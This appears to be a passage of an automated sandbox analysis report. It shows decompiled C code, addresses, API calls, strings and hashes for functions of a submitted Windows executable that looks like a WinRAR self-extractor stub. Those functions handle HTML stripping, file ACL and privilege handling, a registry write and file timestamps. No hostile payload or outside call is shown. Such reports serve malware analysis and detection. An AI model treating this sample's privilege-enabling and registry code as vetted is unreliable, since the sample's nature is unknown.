				void* _t49;
				signed short* _t51;
				short* _t52;
				short* _t54;
				signed short* _t56;
				signed short* _t69;

				_push(__ecx);
				_t56 = _a4;
				_t49 = __ecx;
				_t18 = E0041C86E(__ebx, _t45, _t49, E0041A0A7(_t56) + _t16 + 2);
				_v8 = _t18;
				if(_t18 == 0) {
					L44:
					return _t18;
				}
				_t19 = E00418D92(_t56);
				_t51 = _v8;
				_a7 = _t19;
				_t20 =  *_t56 & 0x0000ffff;
				if(_t20 == 0) {
					L43:
					_t18 = _v8;
					goto L44;
				}
				_push(__ebx);
				while(1) {
					_t65 = _t20;
					if(_t20 != 0) {
						goto L3;
					}
					L26:
					_t21 = E004119C7(_t65, _t56, L"</p>", 4);
					asm("sbb bl, bl");
					_t34 =  ~_t21 + 1;
					_t66 = _t34;
					if(_t34 != 0 || E004119C7(_t66, _t56, L"<br>", 4) == 0) {
						_t22 = 0xd;
						 *_t51 = _t22;
						_t23 = 2;
						_t52 = _t51 + _t23;
						_t41 = 0xa;
						 *_t52 = _t41;
						_t51 = _t52 + _t23;
						if(_t34 != 0) {
							_t43 = 0xd;
							 *_t51 = _t43;
							_t54 = _t51 + _t23;
							_t44 = 0xa;
							 *_t54 = _t44;
							_t51 = _t54 + _t23;
							_t69 = _t51;
						}
					}
					 *_t51 = 0;
					_t25 = E004119C7(_t69, _t56, L"<style>", 7);
					if(_t25 != 0) {
						while(1) {
							_t26 =  *_t56 & 0x0000ffff;
							__eflags = _t26;
							if(_t26 == 0) {
								break;
							}
							__eflags = _t26 - 0x3e;
							if(_t26 == 0x3e) {
								L40:
								_t56 =  &(_t56[1]);
								__eflags = _t56;
								goto L41;
							}
							_t56 =  &(_t56[1]);
							__eflags = _t56;
						}
						__eflags =  *_t56 - 0x3e;
						if( *_t56 != 0x3e) {
							goto L41;
						}
						goto L40;
					} else {
						_t71 =  *_t56 - _t25;
						if( *_t56 == _t25) {
							L42:
							goto L43;
						} else {
							goto L32;
						}
						while(1) {
							L32:
							_t27 = E004119C7(_t71, _t56, L"</style>", 8);
							_t56 =  &(_t56[1]);
							if(_t27 == 0) {
								break;
							}
							if( *_t56 != 0) {
								continue;
							}
							L41:
							_t20 =  *_t56 & 0x0000ffff;
							if(_t20 != 0) {
								goto L3;
							}
							goto L42;
						}
						_t56 =  &(_t56[7]);
						goto L41;
					}
					L3:
					__eflags = _t20 - 0x3c;
					if(__eflags == 0) {
						goto L26;
					}
					__eflags = _a7;
					if(_a7 == 0) {
						L10:
						_t35 = 0;
						__eflags = _a7;
						if(_a7 == 0) {
							L18:
							_t29 =  *_t56 & 0x0000ffff;
							__eflags = _t29;
							if(__eflags == 0) {
								goto L26;
							}
							__eflags = _t29 - 0x20;
							if(_t29 != 0x20) {
								L22:
								 *_t51 = _t29;
								_t51 =  &(_t51[1]);
								__eflags = _t51;
								L23:
								_t56 =  &(_t56[1]);
								__eflags = _t56;
								L24:
								_t20 =  *_t56 & 0x0000ffff;
								continue;
							}
							__eflags = _t51 - _v8;
							if(_t51 == _v8) {
								goto L22;
							}
							__eflags =  *((intOrPtr*)(_t51 - 2)) - _t29;
							if( *((intOrPtr*)(_t51 - 2)) == _t29) {
								goto L23;
							}
							goto L22;
						}
						__eflags = _t20 - 0x26;
						if(_t20 != 0x26) {
							goto L18;
						}
						_t46 = 0;
						__eflags = 0;
						do {
							_t30 = _t46 + _t56;
							_t42 =  *_t30 & 0x0000ffff;
							__eflags = _t42;
							if(_t42 == 0) {
								break;
							}
							__eflags = _t42 - 0x3b;
							if(_t42 == 0x3b) {
								_t12 =  &(_t30[1]); // 0x2
								_t56 = _t12;
								_t35 = 1;
							}
							_t46 = _t46 + 2;
							__eflags = _t46 - 0x28;
						} while (_t46 < 0x28);
						__eflags = _t35;
						if(__eflags != 0) {
							goto L24;
						}
						goto L18;
					}
					__eflags = _t20 - 0xd;
					if(_t20 == 0xd) {
						L7:
						__eflags = _t51 - _v8;
						if(_t51 == _v8) {
							L9:
							_t29 = 0x20;
							goto L22;
						}
						__eflags =  *((short*)(_t51 - 2)) - 0x20;
						if( *((short*)(_t51 - 2)) == 0x20) {
							goto L23;
						}
						goto L9;
					}
					__eflags = _t20 - 0xa;
					if(_t20 != 0xa) {
						goto L10;
					}
					goto L7;
				}
			}

0x004191b9
0x004191bb
0x004191c0
0x004191cc
0x004191d3
0x004191d8
0x00419332
0x00419335
0x00419335
0x004191e1
0x004191e6
0x004191e9
0x004191ec
0x004191f2
0x0041932f
0x0041932f
0x00000000
0x0041932f
0x004191f8
0x00419277
0x00419277
0x0041927a
0x00000000
0x00000000
0x00419280
0x00419288
0x00419291
0x00419293
0x00419293
0x00419295
0x004192aa
0x004192ab
0x004192b0
0x004192b1
0x004192b5
0x004192b6
0x004192b9
0x004192bd
0x004192c1
0x004192c2
0x004192c7
0x004192c9
0x004192ca
0x004192cd
0x004192cd
0x004192cd
0x004192bd
0x004192d9
0x004192dc
0x004192e3
0x00419312
0x00419312
0x00419315
0x00419318
0x00000000
0x00000000
0x0041930a
0x0041930e
0x00419320
0x00419321
0x00419321
0x00000000
0x00419321
0x00419311
0x00419311
0x00419311
0x0041931a
0x0041931e
0x00000000
0x00000000
0x00000000
0x004192e5
0x004192e5
0x004192e8
0x0041932e
0x00000000
0x00000000
0x00000000
0x00000000
0x004192ea
0x004192ea
0x004192f2
0x004192f8
0x004192fb
0x00000000
0x00000000
0x00419301
0x00000000
0x00000000
0x00419322
0x00419322
0x00419328
0x00000000
0x00000000
0x00000000
0x00419328
0x00419305
0x00000000
0x00419305
0x004191fb
0x004191fb
0x004191ff
0x00000000
0x00000000
0x00419201
0x00419205
0x00419224
0x00419224
0x00419226
0x00419229
0x00419254
0x00419254
0x00419257
0x0041925a
0x00000000
0x00000000
0x0041925c
0x00419260
0x0041926d
0x0041926d
0x00419271
0x00419271
0x00419272
0x00419273
0x00419273
0x00419274
0x00419274
0x00000000
0x00419274
0x00419262
0x00419265
0x00000000
0x00000000
0x00419267
0x0041926b
0x00000000
0x00000000
0x00000000
0x0041926b
0x0041922b
0x0041922f
0x00000000
0x00000000
0x00419231
0x00419231
0x00419233
0x00419233
0x00419236
0x00419239
0x0041923c
0x00000000
0x00000000
0x0041923e
0x00419242
0x00419244
0x00419244
0x00419247
0x00419247
0x0041924a
0x0041924b
0x0041924b
0x00419250
0x00419252
0x00000000
0x00000000
0x00000000
0x00419252
0x00419207
0x0041920b
0x00419213
0x00419213
0x00419216
0x0041921f
0x00419221
0x00000000
0x00419221
0x00419218
0x0041921d
0x00000000
0x00000000
0x00000000
0x0041921d
0x0041920d
0x00419211
0x00000000
0x00000000
0x00000000
0x00419211

APIs

_wcslen.LIBCMT ref: 004191C2
_malloc.LIBCMT ref: 004191CC

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

Strings

<br>, xrefs: 00419299
<style>, xrefs: 004192D1
</p>, xrefs: 00419282
</style>, xrefs: 004192EC

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_malloc_wcslen
String ID: </p>$</style>$<br>$<style>
API String ID: 4208083856-1200123991
Opcode ID: 3c19b249a14a3e87462167471613a1488eba34d1917b494517898088e8812474
Instruction ID: 8694eba3c3bc1c3a97c0fb8bf1b2e61266e8750c1768c99e4e580bff8df8ee8d
Opcode Fuzzy Hash: 3c19b249a14a3e87462167471613a1488eba34d1917b494517898088e8812474
Instruction Fuzzy Hash: 25414435680256B5DF345B288822BFA33E4DF16B50F68485BEDC1972C0E67C8DC2C26E

Uniqueness

Uniqueness Score: -1.00%

Function 004065FE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004065FE(void* __ebx, void* __edx, void* __edi) {
				void* __esi;
				int _t24;
				int _t26;
				void* _t29;
				int _t32;
				void* _t34;
				struct _SECURITY_DESCRIPTOR* _t35;
				void* _t42;
				long _t43;
				struct _SECURITY_DESCRIPTOR* _t45;
				void* _t47;
				struct _SECURITY_DESCRIPTOR* _t51;

				_t42 = __edi;
				_t34 = __ebx;
				E00419DD4(E004291F1, _t47);
				E0041A3E0(0x1010);
				_t45 = 0;
				 *(_t47 - 0x1c) = 0;
				 *((intOrPtr*)(_t47 - 0x18)) = 0;
				 *((intOrPtr*)(_t47 - 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 0x10)) = 0;
				_push(0);
				_push(_t47 - 0x1c);
				 *((intOrPtr*)(_t47 - 4)) = 0;
				_t24 = E00402C37( *((intOrPtr*)(_t47 + 8)), __edx);
				if(_t24 != 0) {
					__eflags =  *0x432a61;
					if( *0x432a61 == 0) {
						_t32 = E0040647C(L"SeSecurityPrivilege");
						__eflags = _t32;
						if(_t32 != 0) {
							 *0x432a60 = 1;
						}
						E0040647C(L"SeRestorePrivilege");
						 *0x432a61 = 1;
					}
					__eflags =  *0x432a60;
					_push(_t34);
					_push(_t42);
					_t43 = 7;
					if( *0x432a60 != 0) {
						_t43 = 0xf;
					}
					_t35 =  *(_t47 - 0x1c);
					_t45 = SetFileSecurityW;
					_t24 = SetFileSecurityW( *(_t47 + 0xc), _t43, _t35);
					__eflags = _t24;
					if(_t24 == 0) {
						_t26 = E0040A582( *(_t47 + 0xc), _t47 - 0x101c, 0x800);
						__eflags = _t26;
						if(_t26 == 0) {
							L11:
							_t28 =  *((intOrPtr*)(_t47 + 8)) + 0x1e;
							__eflags =  *((intOrPtr*)(_t47 + 8)) + 0x1e;
							_t29 = E004062C8(0x4f, _t28,  *(_t47 + 0xc));
							_t45 = 0x432a6c;
							E00422FB3(_t29);
							_t24 = E00406222(0x432a6c, 1);
						} else {
							_t24 = SetFileSecurityW(_t47 - 0x101c, _t43, _t35);
							__eflags = _t24;
							if(_t24 == 0) {
								goto L11;
							}
						}
					}
					__eflags =  *(_t47 - 0x1c);
					_pop(_t42);
					_pop(_t34);
				} else {
					_t51 =  *(_t47 - 0x1c);
				}
				if(_t51 != 0) {
					_push( *(_t47 - 0x1c));
					_t24 = E00419DFE(_t34, _t42, _t45, _t51);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}

0x004065fe
0x004065fe
0x00406603
0x0040660d
0x00406613
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406624
0x00406628
0x00406629
0x0040662c
0x00406633
0x0040663d
0x00406644
0x0040664b
0x00406650
0x00406652
0x00406654
0x00406654
0x00406660
0x00406665
0x00406665
0x0040666c
0x00406673
0x00406674
0x00406677
0x00406678
0x0040667c
0x0040667c
0x0040667d
0x00406680
0x0040668b
0x0040668d
0x0040668f
0x004066a0
0x004066a5
0x004066a7
0x004066b8
0x004066be
0x004066be
0x004066c4
0x004066c9
0x004066d0
0x004066d9
0x004066a9
0x004066b2
0x004066b4
0x004066b6
0x00000000
0x00000000
0x004066b6
0x004066a7
0x004066de
0x004066e2
0x004066e3
0x00406635
0x00406635
0x00406635
0x004066e4
0x004066e6
0x004066e9
0x004066ee
0x004066f3
0x004066fb

APIs

__EH_prolog.LIBCMT ref: 00406603

Part of subcall function 00402C37: __EH_prolog.LIBCMT ref: 00402C3C

SetFileSecurityW.ADVAPI32(?,00000007,?,?,?,?,00000000), ref: 0040668B
SetFileSecurityW.ADVAPI32(?,00000007,?,?,?,00000800,?,?,?,00000000), ref: 004066B2

Strings

l*C, xrefs: 004066C9
SeSecurityPrivilege, xrefs: 00406646
SeRestorePrivilege, xrefs: 0040665B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileH_prologSecurity
String ID: SeRestorePrivilege$SeSecurityPrivilege$l*C
API String ID: 2167059215-2789806455
Opcode ID: ef4f57ba5f515b1b16d7df303a83c3d226a262347cef5251b94ba64a72c138a8
Instruction ID: 1e67852812f8d6d701fc1555d6d8396ef76a83567532402e9a1f3c922cddbed7
Opcode Fuzzy Hash: ef4f57ba5f515b1b16d7df303a83c3d226a262347cef5251b94ba64a72c138a8
Instruction Fuzzy Hash: 7F21A771A40258ABEF20AB55D941BEE7B79AF04B48F00443BF841762C1C7BD4A51CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D779, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D779(void* __esi, char* _a4) {
				void* _v8;
				int _v12;
				short _v4108;
				long _t12;
				intOrPtr _t27;

				_t12 = E0041A3E0(0x1008);
				if( *0x440d30 != 0) {
					_t27 =  *0x437cd0; // 0x43
					if(_t27 != 0) {
						E0040D73C( &_v4108, "C:\Users\jones\AppData\Roaming");
						_t12 = RegCreateKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12);
						if(_t12 == 0) {
							RegSetValueExW(_v8,  &_v4108, 0, 1, _a4, E0041A0A7(_a4) + _t16 + 2);
							return RegCloseKey(_v8);
						}
					}
				}
				return _t12;
			}

0x0040d781
0x0040d78f
0x0040d791
0x0040d798
0x0040d7a6
0x0040d7c6
0x0040d7cf
0x0040d7ef
0x00000000
0x0040d7f8
0x0040d7cf
0x0040d798
0x0040d800

APIs

Part of subcall function 0040D73C: _wcscpy.LIBCMT ref: 0040D741

RegCreateKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Users\user\AppData\Roaming), ref: 0040D7C6
_wcslen.LIBCMT ref: 0040D7D4
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040D7EF
RegCloseKey.ADVAPI32(?), ref: 0040D7F8

Strings

Software\WinRAR SFX, xrefs: 0040D7BC
C:\Users\user\AppData\Roaming, xrefs: 0040D791, 0040D79B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValue_wcscpy_wcslen
String ID: C:\Users\user\AppData\Roaming$Software\WinRAR SFX
API String ID: 3170333323-4061377072
Opcode ID: b24845c4c5e81a8becf387da437c68e0f59d8fb1edc980cda3e5bab5d3235586
Instruction ID: 33e20c4dbafed35b12532696fe32eb7668ea18173d538cfad1b3c8a3cb953bf1
Opcode Fuzzy Hash: b24845c4c5e81a8becf387da437c68e0f59d8fb1edc980cda3e5bab5d3235586
Instruction Fuzzy Hash: C6014FB290015CFFDB219FD0DC85EEA7B6DEB04348F004076B905A20A1D7745E99A669

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB53, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CB53(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t12;

				_t12 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					_t6 = LoadLibraryW(L"Crypt32.dll");
					 *_t12 = _t6;
					if(_t6 != 0) {
						_t12[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t12, "CryptUnprotectMemory");
						_t12[3] = _t6;
					}
					_t12[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0040cb54
0x0040cb5a
0x0040cb61
0x0040cb67
0x0040cb6b
0x0040cb83
0x0040cb86
0x0040cb88
0x0040cb8b
0x0040cb8c
0x00000000
0x0040cb8c
0x0040cb91

APIs

LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CBAB,00000020,?,?,00405D18,?,00000020,00000001,?,00000010,?,?,?,00000001), ref: 0040CB61
GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CB7A
GetProcAddress.KERNEL32(00437CB8,CryptUnprotectMemory), ref: 0040CB86

Strings

CryptProtectMemory, xrefs: 0040CB74
Crypt32.dll, xrefs: 0040CB5C
CryptUnprotectMemory, xrefs: 0040CB7C

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2238633743-1753850145
Opcode ID: e173949cd1cb4a85e11643db0108d0270316da96c1d8be82c143109ee412fc80
Instruction ID: 1d8e0f8bd94feec2c5185869051b9aeb27867bdc370f0322f6e9d8ec5cba3710
Opcode Fuzzy Hash: e173949cd1cb4a85e11643db0108d0270316da96c1d8be82c143109ee412fc80
Instruction Fuzzy Hash: 4DE09270A003119FD7305F79B845B42FBF89FA4710B11842FE884D3250D6B8E4558B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00418CBB, Relevance: 9.1, APIs: 6, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00418CBB(intOrPtr* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				long _v16;
				struct tagMSG _v44;
				long _t28;
				intOrPtr* _t37;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t65;
				void* _t66;

				_v8 = 0;
				_v12 = 0;
				_t28 = GetTickCount();
				_t65 = _a4;
				_v16 = _t28;
				while(1) {
					_push( &_v8);
					_push(_t65);
					if( *((intOrPtr*)( *_t65 + 0x48))() >= 0 && _v8 != 0) {
						break;
					}
					if(GetTickCount() - _v16 > 0x2710) {
						break;
					}
					if(PeekMessageW( &_v44, 0, 0, 0, 0) != 0) {
						GetMessageW( &_v44, 0, 0, 0);
						TranslateMessage( &_v44);
						DispatchMessageW( &_v44);
					}
				}
				_t66 =  *((intOrPtr*)( *_t65 + 0x48))(_t65,  &_v8);
				if(_t66 >= 0) {
					_t37 = _v8;
					_t66 =  *((intOrPtr*)( *_t37))(_t37, 0x42b0b8,  &_v12);
					if(_t66 >= 0) {
						_t41 = _v12;
						_t66 =  *((intOrPtr*)( *_t41 + 0x20))(_t41);
						if(_t66 >= 0) {
							_t45 = _v12;
							_t66 =  *((intOrPtr*)( *_t45 + 0x14))(_t45, _a8);
						}
						_t43 = _v12;
						 *((intOrPtr*)( *_t43 + 8))(_t43);
					}
					_t39 = _v8;
					 *((intOrPtr*)( *_t39 + 8))(_t39);
				}
				return 0 | _t66 >= 0x00000000;
			}

0x00418ccc
0x00418ccf
0x00418cd2
0x00418cd4
0x00418cd7
0x00418cda
0x00418cdf
0x00418ce0
0x00418ce6
0x00000000
0x00000000
0x00418cf7
0x00000000
0x00000000
0x00418d09
0x00418d12
0x00418d1c
0x00418d26
0x00418d26
0x00418d09
0x00418d38
0x00418d3c
0x00418d3e
0x00418d4f
0x00418d53
0x00418d55
0x00418d5e
0x00418d62
0x00418d64
0x00418d70
0x00418d70
0x00418d72
0x00418d78
0x00418d78
0x00418d7b
0x00418d81
0x00418d81
0x00418d8f

APIs

GetTickCount.KERNEL32 ref: 00418CD2
GetTickCount.KERNEL32 ref: 00418CED
PeekMessageW.USER32 ref: 00418D01
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00418D12
TranslateMessage.USER32(?), ref: 00418D1C
DispatchMessageW.USER32 ref: 00418D26

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$CountTick$DispatchPeekTranslate
String ID:
API String ID: 3906477200-0
Opcode ID: 0e902736a8126ea245fd19e36d0a7ae87af1ca5f35abdc340aba89182c679f5f
Instruction ID: 74bb37f67e3d98b3f9299ff30071719679fa89bae5b0aa17809b44f6e55da97d
Opcode Fuzzy Hash: 0e902736a8126ea245fd19e36d0a7ae87af1ca5f35abdc340aba89182c679f5f
Instruction Fuzzy Hash: 86313075900218AFCB10DFA9D88CCCEBBB8FF897157104559E945E7250D734DD81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041D785, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041D785(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x42d7c0);
				E0041F49C(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00419CCE(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0041E3B4(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0041E3B4(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0041E3B4(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0041E3B4(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00419D73(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0041D8AB(_t48, _t53, _t55, _t57, _t61);
				return E0041F4E1( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0041d785
0x0041d785
0x0041d785
0x0041d787
0x0041d78c
0x0041d791
0x0041d793
0x0041d796
0x0041d799
0x0041d79c
0x0041d7a3
0x0041d7b4
0x0041d7c2
0x0041d7d0
0x0041d7d8
0x0041d7e6
0x0041d7ec
0x0041d7f3
0x0041d7f6
0x0041d80c
0x0041d80f
0x0041d884
0x0041d88b
0x0041d892
0x0041d89f

APIs

__CreateFrameInfo.LIBCMT ref: 0041D7AD

Part of subcall function 00419CCE: __getptd.LIBCMT ref: 00419CDC
Part of subcall function 00419CCE: __getptd.LIBCMT ref: 00419CEA

__getptd.LIBCMT ref: 0041D7B7

Part of subcall function 0041E3B4: __getptd_noexit.LIBCMT ref: 0041E3B7
Part of subcall function 0041E3B4: __amsg_exit.LIBCMT ref: 0041E3C4

__getptd.LIBCMT ref: 0041D7C5
__getptd.LIBCMT ref: 0041D7D3
__getptd.LIBCMT ref: 0041D7DE
_CallCatchBlock2.LIBCMT ref: 0041D804

Part of subcall function 00419D73: __CallSettingFrame@12.LIBCMT ref: 00419DBF

Part of subcall function 0041D8AB: __getptd.LIBCMT ref: 0041D8BA
Part of subcall function 0041D8AB: __getptd.LIBCMT ref: 0041D8C8

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 57a1760aeba746270b17b39021609e580bafb2de7dbe7e1400a8691e1f9c4969
Instruction ID: d8470d71340e2d4452161d0ee2427eb2eec62f49000138e2147752d2d0fac31c
Opcode Fuzzy Hash: 57a1760aeba746270b17b39021609e580bafb2de7dbe7e1400a8691e1f9c4969
Instruction Fuzzy Hash: AC110AB1D00209DFDF00EFA5D545ADD7BB0FF04318F10806AF815A7252DB389A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 00406AD4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00406AD4(void* __edx) {
				void* __ebx;
				void* __edi;
				void* _t42;
				signed int _t52;
				signed int _t55;
				void* _t59;
				signed int _t60;
				signed int _t66;
				signed int _t76;
				void* _t92;
				short* _t98;
				void* _t100;

				_t92 = __edx;
				E00419DD4(E0042918F, _t100);
				E0041A3E0(0x5094);
				_t98 =  *((intOrPtr*)(_t100 + 0xc));
				if( *_t98 == 0 ||  *((short*)(_t98 + 2)) != 0) {
					_push(0x802);
					_t42 = _t100 - 0x307c;
				} else {
					E0041A0EF(_t100 - 0x307c, L".\\");
					_push(0x800);
					_t42 = _t100 - 0x3078;
				}
				_push(_t98);
				_push(_t42);
				E0041078F();
				E004064ED( *((intOrPtr*)(_t100 + 8)), 0x802,  *((intOrPtr*)(_t100 + 8)), _t100 - 0x407c, 0x800);
				if( *((short*)(_t100 - 0x407c)) == 0x3a) {
					E004107BC(__eflags, _t100 - 0x307c, _t100 - 0x407c, 0x802);
					E004065D5(_t100 - 0x2078);
					_push(0);
					_t76 = E00409429(_t92, _t98, _t100 - 0x2078);
					_t52 =  *(_t100 - 0x1070);
					__eflags = _t52 & 0x00000001;
					if((_t52 & 0x00000001) != 0) {
						_t68 = _t52 & 0xfffffffe;
						__eflags = _t52 & 0xfffffffe;
						E00408E0E(_t98, _t68);
					}
					E00408533(_t100 - 0x1030);
					 *(_t100 - 4) = 0;
					_t55 = E00408796(_t100 - 0x1030, __eflags, _t100 - 0x307c, 9);
					__eflags = _t55;
					if(_t55 != 0) {
						_push(_t100 - 0x1030);
						_push(0);
						_t66 = E00402C37( *((intOrPtr*)(_t100 + 8)), _t92);
						__eflags = _t66;
						if(_t66 != 0) {
							E004087BE(_t100 - 0x1030);
						}
					}
					E00408533(_t100 - 0x50a0);
					 *(_t100 - 4) = 1;
					__eflags = _t76;
					if(_t76 != 0) {
						_push(5);
						_push(_t98);
						_t60 = E00408570(_t100 - 0x50a0);
						__eflags = _t60;
						if(_t60 != 0) {
							SetFileTime( *(_t100 - 0x509c), _t100 - 0x1050, _t100 - 0x1048, _t100 - 0x1040);
						}
					}
					E00408E0E(_t98,  *(_t100 - 0x1070));
					 *(_t100 - 4) = 0;
					E004089F9(_t76, _t100 - 0x50a0);
					_t34 = _t100 - 4;
					 *_t34 =  *(_t100 - 4) | 0xffffffff;
					__eflags =  *_t34;
					_t59 = E004089F9(_t76, _t100 - 0x1030);
				} else {
					E004062C8(0x50, _t75 + 0x1e, _t98);
					_t59 = E00406222(0x432a6c, 3);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t100 - 0xc));
				return _t59;
			}

0x00406ad4
0x00406ad9
0x00406ae3
0x00406aea
0x00406afa
0x00406b1f
0x00406b20
0x00406b03
0x00406b0f
0x00406b16
0x00406b17
0x00406b17
0x00406b26
0x00406b27
0x00406b28
0x00406b39
0x00406b46
0x00406b74
0x00406b7f
0x00406b86
